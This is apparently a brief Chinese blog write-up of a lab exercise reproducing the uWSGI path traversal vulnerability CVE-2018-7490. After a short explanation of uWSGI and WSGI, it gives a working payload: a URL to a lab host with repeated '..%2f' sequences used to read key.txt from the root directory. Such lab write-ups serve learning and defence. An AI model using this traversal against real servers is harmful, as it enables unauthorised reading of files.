uWSGI 漏洞复现(CVE-2018-7490)

uWSGI是一个Web服务器,它实现了WSGI协议、uwsgi、http等协议。Nginx中HttpUwsgiModule的作用是与uWSGI服务器进行交换。WSGI是一种Web服务器网关接口。它是一个Web服务器(如nginx,uWSGI等服务器)与web应用(如用Flask框架写的程序)通信的一种规范。

 

 

 

目标:

了解uWSGI CVE-2018-7490漏洞形成原理和漏洞利用方法。

利用搜索工具了解CVE-2018-7490漏洞详情。再利用漏洞获取根目录key.txt的值。

 

 

 

解析思路
http://219.153.49.228:48001/..%2f..%2fkey.txt
.. 表示上一级
%2f表示/

在IP后面输入:  ..%2f..%2f..%2f..%2f..%2f..%2f..%2fkey.txt
 

posted @ 2019-10-22 16:10  暮日温柔  阅读(3330)  评论(0编辑  收藏  举报